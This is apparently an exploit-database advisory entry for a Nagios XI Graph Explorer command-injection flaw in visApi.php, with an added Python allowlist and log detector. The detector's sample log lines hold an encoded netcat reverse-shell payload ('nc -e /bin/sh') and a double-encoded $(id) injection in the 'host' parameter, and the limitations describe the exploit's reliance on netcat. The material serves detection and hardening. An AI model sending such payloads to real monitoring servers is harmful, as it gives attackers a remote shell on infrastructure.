Nagios XI Graph Explorer Component OS Command Injection Vulnerability

Added: 01/23/2013
BID: 54263
OSVDB: 83552

Background

Nagios XI is a network host and service monitoring and management system.

Problem

The Graph Explorer component of Nagios XI allows an authenticated user to execute arbitrary OS commands on the monitoring server. The flaw is in the visApi.php script, which does not sanitize the user-supplied 'host' parameter before using it in an OS command, so shell metacharacters embedded in that parameter are interpreted by the shell.
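As an added illustration (not code from this exploit index entry or from Nagios), the following Python snippet shows the two checks a practitioner would want around this class of bug: a strict hostname allowlist that a 'host' parameter must pass before it is ever used in an OS command, and a detector that applies the same allowlist to web-server access logs to flag visApi.php requests carrying shell metacharacters, including double-encoded ones. The log lines are constructed for the example; the request path under /nagiosxi/ and the combined-log format are assumptions, and only the script name visApi.php and the 'host' parameter come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Allowlist for a monitored host name: RFC 1123 labels joined by dots, or a
# dotted-quad IPv4 literal. Anything else (';', '|', '`', '$(', quotes,
# whitespace, a leading '-') is rejected before it can reach a shell.
# This pattern is an assumption of the example, not Nagios's own check.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")
_IPV4_RE = re.compile(
    r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$"
)


def is_safe_host(value: str) -> bool:
    """Return True only if value is a plain hostname or an IPv4 literal."""
    if not value or len(value) > 253:
        return False
    return bool(_HOSTNAME_RE.match(value) or _IPV4_RE.match(value))


# Apache combined-log-style request line; only the fields we need are captured.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_injection_attempts(log_lines, script="visApi.php"):
    """Flag requests to the given script whose 'host' parameter fails the allowlist.

    Returns a list of (client_ip, authenticated_user, decoded_host) tuples.
    """
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs decodes one layer of percent-encoding and turns '+' into ' ';
        # a second unquote() catches double-encoded payloads such as %2524 -> %24 -> $
        for raw in parse_qs(url.query, keep_blank_values=True).get("host", []):
            host = unquote(raw)
            if not is_safe_host(host):
                hits.append((m.group("ip"), m.group("user"), host))
    return hits


# Constructed sample log lines (not from a real Nagios host). Lines 2 and 3 carry
# a ';'-chained command and a double-encoded $(id), respectively.
SAMPLE_LOG = [
    '10.0.0.5 - nagiosadmin [23/Jan/2013:10:15:02 +0000] '
    '"GET /nagiosxi/includes/components/graphexplorer/visApi.php?type=host&host=localhost HTTP/1.1" 200 1843',
    '10.0.0.9 - nagiosadmin [23/Jan/2013:10:15:31 +0000] '
    '"GET /nagiosxi/includes/components/graphexplorer/visApi.php?type=host&host=localhost%3Bnc+-e+%2Fbin%2Fsh+10.0.0.9+4444 HTTP/1.1" 200 17',
    '10.0.0.9 - nagiosadmin [23/Jan/2013:10:16:05 +0000] '
    '"GET /nagiosxi/includes/components/graphexplorer/visApi.php?host=%2524%2528id%2529 HTTP/1.1" 200 17',
    '10.0.0.5 - nagiosadmin [23/Jan/2013:10:17:44 +0000] '
    '"GET /nagiosxi/index.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, user, host in find_injection_attempts(SAMPLE_LOG):
        print(f"suspicious host parameter from {ip} as {user}: {host!r}")
```

The same allowlist belongs in the PHP script itself, applied to $_GET['host'] before the value is handed to any exec()/passthru()/system() call; wrapping the value in escapeshellarg() afterwards is a reasonable second layer, but an allowlist is the check that actually stops this bug class, since a hostname never legitimately contains shell metacharacters. Because the exploit requires valid credentials, the authenticated user captured from the log is the pivot for the incident: it is either a compromised account or an insider.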

Resolution

Upgrade to Nagios Graph Explorer SVN 1.3.

References

http://secunia.com/advisories/49749/

Limitations

This exploit has been tested against Nagios XI 2011r1.9 (Nagios Enterprises) on CentOS 6 (CentOS Project) with Exec-Shield enabled.

This exploit requires valid Nagios web interface login credentials.

The Netcat (nc) utility must be installed on the target; the exploit depends on it.

Platforms

Linux
